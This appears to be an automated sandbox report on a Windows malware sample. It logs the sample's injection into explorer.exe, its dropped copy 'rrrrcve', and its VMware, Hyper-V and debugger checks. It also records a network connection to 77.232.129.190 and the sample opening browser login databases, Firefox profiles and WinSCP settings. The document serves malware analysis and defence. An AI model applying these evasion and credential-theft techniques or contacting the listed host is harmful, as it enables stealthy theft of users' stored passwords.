                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Code function: 0_2_004012F2 pushfd ; retf 0_2_004012F3
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_3_05D89719 push eax; ret 6_3_05D89725
                    Source: C:\Windows\explorer.exe | Code function: 7_2_0098A055 push es; iretd 7_2_0098A05D
                    Source: C:\Windows\explorer.exe | Code function: 7_2_00981405 push esi; ret 7_2_00981407
                    Source: C:\Windows\explorer.exe | Code function: 7_2_009847A7 push esp; iretd 7_2_009847A8
                    Source: C:\Windows\explorer.exe | Code function: 7_2_009814D4 push esi; ret 7_2_009814D6
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_008338A7 push esp; iretd 8_2_008338A8
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_008394E6 push edx; ret 8_2_008394E7
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0083967E push ds; retf 8_2_00839680
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00388EEF push edi; ret 9_2_00388EF0
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_003887CE push es; ret 9_2_00388A18
                    Source: C:\Windows\explorer.exe | Code function: 10_2_00CA14D4 push esi; ret 10_2_00CA14D6
                    Source: C:\Windows\explorer.exe | Code function: 10_2_00CA1405 push esi; ret 10_2_00CA1407
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_00843417 push esp; iretd 11_2_00843418
                    Source: C:\Windows\explorer.exe | Code function: 15_2_00F714D4 push esi; ret 15_2_00F714D6
                    Source: C:\Windows\explorer.exe | Code function: 15_2_00F745A7 push esp; iretd 15_2_00F745A8
                    Source: C:\Windows\explorer.exe | Code function: 15_2_00F71405 push esi; ret 15_2_00F71407
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_006D3627 push esp; iretd 16_2_006D3628
                    Source: C:\Windows\explorer.exe | Code function: 17_2_0043AC8D push esp; iretd 17_2_0043AC95
                    Source: C:\Windows\explorer.exe | Code function: 17_2_0043AAD2 push ebp; iretd 17_2_0043AAD3
                    Source: C:\Windows\explorer.exe | Code function: 17_2_004314D4 push esi; ret 17_2_004314D6
                    Source: C:\Windows\explorer.exe | Code function: 17_2_00431405 push esi; ret 17_2_00431407
                    Source: C:\Windows\explorer.exe | Code function: 17_2_00434817 push esp; iretd 17_2_00434818
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Static PE information: section name: .text entropy: 6.9994558883301154
                    Source: rrrrcve.1.dr | Static PE information: section name: .text entropy: 6.9994558883301154
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\rrrrcve

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\rrrrcve:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, 9_2_00383862
                    Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\rrrrcve | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, 9_2_00383862
                    Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep | graph_11-882
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, 00000000.00000002.1743649445.00000000005E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, 9_2_00383862
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 465
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1664
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 731
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 373
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 366
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2786
                    Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 871
                    Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 883
                    Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 914
                    Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 1126
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 902
                    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 552
                    Source: C:\Windows\explorer.exe TID: 7220 | Thread sleep count: 465 > 30
                    Source: C:\Windows\explorer.exe TID: 7228 | Thread sleep count: 1664 > 30
                    Source: C:\Windows\explorer.exe TID: 7228 | Thread sleep time: -166400s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7224 | Thread sleep count: 731 > 30
                    Source: C:\Windows\explorer.exe TID: 7224 | Thread sleep time: -73100s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7712 | Thread sleep count: 373 > 30
                    Source: C:\Windows\explorer.exe TID: 7712 | Thread sleep time: -37300s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7704 | Thread sleep count: 222 > 30
                    Source: C:\Windows\explorer.exe TID: 7708 | Thread sleep count: 366 > 30
                    Source: C:\Windows\explorer.exe TID: 7708 | Thread sleep time: -36600s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7228 | Thread sleep count: 2786 > 30
                    Source: C:\Windows\explorer.exe TID: 7228 | Thread sleep time: -278600s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7656 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7692 | Thread sleep count: 914 > 30
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7692 | Thread sleep time: -914000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7744 | Thread sleep count: 1126 > 30
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7744 | Thread sleep time: -1126000s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7844 | Thread sleep count: 902 > 30
                    Source: C:\Windows\explorer.exe TID: 7844 | Thread sleep time: -902000s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7948 | Thread sleep count: 552 > 30
                    Source: C:\Windows\explorer.exe TID: 7948 | Thread sleep time: -552000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
                    Source: C:\Windows\explorer.exe | Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 6_2_03002B15
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03003ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 6_2_03003ED9
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03001D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 6_2_03001D4A
                    Source: C:\Windows\explorer.exe | Code function: 7_2_009830A8 FindFirstFileW,FindNextFileW,FindClose, 7_2_009830A8
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0083255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose, 8_2_0083255C
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_003815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose, 9_2_003815BE
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_003813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose, 9_2_003813FE
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_003814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose, 9_2_003814D8
                    Source: C:\Windows\explorer.exe | Code function: 10_2_00CA1DB0 FindFirstFileW,FindNextFileW,FindClose, 10_2_00CA1DB0
                    Source: C:\Windows\explorer.exe | Code function: 10_2_00CA1EB4 FindFirstFileW,FindNextFileW,FindClose, 10_2_00CA1EB4
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03006512 GetSystemInfo, 6_2_03006512
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
                    Source: explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000001.00000000.1729353943.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003250000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.000000000327B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000001.00000000.1729353943.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | System information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Roaming\rrrrcve | System information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\rrrrcve | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Code function: 0_2_00402920 LdrLoadDll,0_2_00402920
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,9_2_00383862
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,6_2_03002198
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03001000 GetProcessHeap,RtlAllocateHeap,6_2_03001000

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\explorer.exe | File created: rrrrcve.1.dr
                    Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 77.232.129.190 80
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Thread created: C:\Windows\explorer.exe EIP: 33F1960
                    Source: C:\Users\user\AppData\Roaming\rrrrcve | Thread created: unknown EIP: 87C1960
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7616 base: 9479C0 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7640 base: 7FF72B812D10 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7672 base: 9479C0 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7688 base: 9479C0 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7716 base: 7FF72B812D10 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7740 base: 9479C0 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7840 base: 7FF72B812D10 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7900 base: 9479C0 value: 90
                    Source: C:\Windows\explorer.exe | Memory written: PID: 7944 base: 7FF72B812D10 value: 90
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Roaming\rrrrcve | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Roaming\rrrrcve | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0
                    Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0
                    Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0
                    Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0
                    Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe 16_2_006D10A5
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe 16_2_006D1016
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1727134633.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_030555EB cpuid 6_2_030555EB
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,6_2_03002112
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,6_2_03002198

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
                    Source: Yara match | File source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, type: SAMPLE
                    Source: Yara match | File source: 0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\rrrrcve, type: DROPPED
                    Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\data.safe.bin
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829702.cde8135c-88c3-4c34-8670-7ef017742548.new-profile.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\background-update
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834620.c7889da7-33f0-4599-8452-58d47c58437b.main.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829744.7278f154-e8f4-4235-84c5-c5c1c6af0084.main.jsonlz4
